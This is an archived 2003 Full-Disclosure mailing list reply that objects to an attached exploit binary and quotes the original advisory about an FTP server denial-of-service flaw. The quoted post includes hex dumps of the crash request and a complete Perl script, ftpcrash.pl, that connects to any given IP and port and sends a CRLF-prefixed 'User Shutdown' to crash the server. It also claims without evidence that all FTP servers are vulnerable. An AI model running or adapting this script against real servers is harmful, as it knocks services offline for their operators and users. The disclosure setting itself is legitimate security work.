[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [Full-Disclosure] FTPServer Denial Of Service Vulnerability

To: "Florian Rock" <florianrock@web.de>, <vuln@secunia.com>, <full-disclosure@lists.netsys.com>
Subject: RE: [Full-Disclosure] FTPServer Denial Of Service Vulnerability
From: "Aditya [Aditya Lalit Desgmukh]" <aditya@online.gr8domain.biz>
Date: Wed, 20 Aug 2003 10:15:19 +0530

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2722.900" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><SPAN class=250051804-20082003><FONT face=Arial color=#0000ff size=2>hi 
there,</FONT></SPAN></DIV>
<DIV><SPAN class=250051804-20082003><FONT face=Arial color=#0000ff size=2>no 
binaries please! the source code in enough....</FONT></SPAN></DIV>
<BLOCKQUOTE dir=ltr style="MARGIN-RIGHT: 0px">
  <DIV class=OutlookMessageHeader dir=ltr align=left><FONT face=Tahoma 
  size=2>-----Original Message-----<BR><B>From:</B> 
  full-disclosure-admin@lists.netsys.com 
  [mailto:full-disclosure-admin@lists.netsys.com]<B>On Behalf Of </B>Florian 
  Rock<BR><B>Sent:</B> Monday, August 18, 2003 6:34 PM<BR><B>To:</B> 
  vuln@secunia.com; full-disclosure@lists.netsys.com<BR><B>Subject:</B> 
  [Full-Disclosure] FTPServer Denial Of Service 
  Vulnerability<BR><BR></FONT></DIV>
  <DIV><FONT face=Arial size=2>I</FONT><FONT face=Arial size=2>&nbsp;have found 
  a very serious hole in FTPServer<BR>The Exploit is tested on Cerberus FTP 
  Server 1.71 and a own coded, but I think all FTPServer are 
  Vulnerable</FONT></DIV>
  <DIV><FONT face=Arial size=2>Sorry but i have to less ftpserver to 
  test</FONT></DIV>
  <DIV><FONT face=Arial size=2></FONT>&nbsp;</DIV>
  <DIV><FONT face=Arial size=2>And so it Works<BR>Typical 
  request:<BR>00000000&nbsp; 55 73 65 72 20 53&nbsp; 68 75 74 64 6f 77 6e 0d 
  0a&nbsp;&nbsp;&nbsp; User Shutdown..</FONT></DIV>
  <DIV><FONT face=Arial size=2></FONT>&nbsp;</DIV>
  <DIV><FONT face=Arial size=2>Exploit request:<BR>00000000&nbsp; 0d 0a 55 73 65 
  72 20 53&nbsp; 68 75 74 64 6f 77 6e&nbsp;&nbsp;&nbsp; ..User 
  Shutdown</FONT></DIV>
  <DIV>&nbsp;</DIV>
  <DIV><FONT face=Arial size=2>I've coded an exploit:<BR>See attached file: 
  ftpcrash.exe (ziped) for people how have no perl</FONT></DIV>
  <DIV><FONT face=Arial color=#0000ff size=2></FONT>&nbsp;</DIV>
  <DIV><FONT face=Arial size=2>My exploit (in 
  perl):<BR>[code]<BR>-ftpcrash.pl-<BR>print "Exploit for 
  FTP-Server\n";<BR>print "&nbsp;&nbsp; by The real Remoter\n";<BR>my $usage = 
  "\nftpcrash &lt;IP&gt; &lt;Port&gt;\n";<BR>die "$usage" unless $ARGV[0] 
  &amp;&amp; $ARGV[1];<BR>use Socket;<BR>my $remote = $ARGV[0];<BR>my $port = 
  $ARGV[1];<BR>my $iaddr = inet_aton($remote);<BR>my $proto = 
  getprotobyname("tcp");<BR>my $paddr = sockaddr_in($port, 
  $iaddr);<BR>socket(SOCK, PF_INET, SOCK_STREAM, $proto);<BR>connect(SOCK, 
  $paddr) or die "Can't connect to " . $remote;<BR>print "Sending 
  exploit\n";<BR>$msg = "\x0d\x0a";<BR>$msg = $msg . "User 
  Shutdown";<BR>send(SOCK,$msg, 0) or die "Can't send 
  Exploit";<BR>sleep(1);<BR>print "Server 
  Crashed!";<BR>sleep(1);<BR>exit;<BR>[/code]</FONT></DIV>
  <DIV><FONT face=Arial size=2></FONT>&nbsp;</DIV>
  <DIV><FONT face=Arial size=2>Sorry for my bad english (I'm german)</FONT><FONT 
  face=Arial size=2><FONT size=1></DIV></BLOCKQUOTE></FONT></FONT></BODY></HTML>

smime.p7s

References:
- [Full-Disclosure] FTPServer Denial Of Service Vulnerability
  - From: "Florian Rock" <florianrock@web.de>

Prev by Date: RE: [Full-Disclosure] Administrivia: Testing Emergency Virus Filter..
Next by Date: Re: AW: [Full-Disclosure] securing php
Prev by thread: Re: [Full-Disclosure] FTPServer Denial Of Service Vulnerability
Next by thread: [Full-Disclosure] Administrivia: Binary Executables w/o Source
Index(es):
- Date
- Thread